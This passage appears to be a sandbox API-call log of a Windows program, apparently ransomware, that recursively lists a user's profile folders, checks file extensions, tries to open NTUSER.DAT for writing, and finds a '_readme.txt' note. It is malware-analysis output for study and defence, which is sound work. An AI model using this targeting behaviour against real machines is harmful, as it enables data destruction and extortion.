[0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ff2490, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x6ff2490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x729fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x729fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0058.293] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0058.293] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0058.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0058.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0058.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0058.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0058.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0058.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0058.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x741cb10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x741cb10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x73aa6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x73aa6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.295] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0058.295] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.295] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.295] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.295] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.296] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0058.296] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.296] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.296] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.296] PathFindFileNameW (pszPath="") returned="" [0058.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.296] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19bf9e70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x19bf9e70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0058.296] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.296] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.296] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.296] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0058.296] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.296] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.297] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.297] PathFindFileNameW (pszPath="") returned="" [0058.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0058.297] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.297] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.297] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0058.297] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.297] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.297] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.297] PathFindFileNameW (pszPath="") returned="" [0058.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.297] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.297] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, 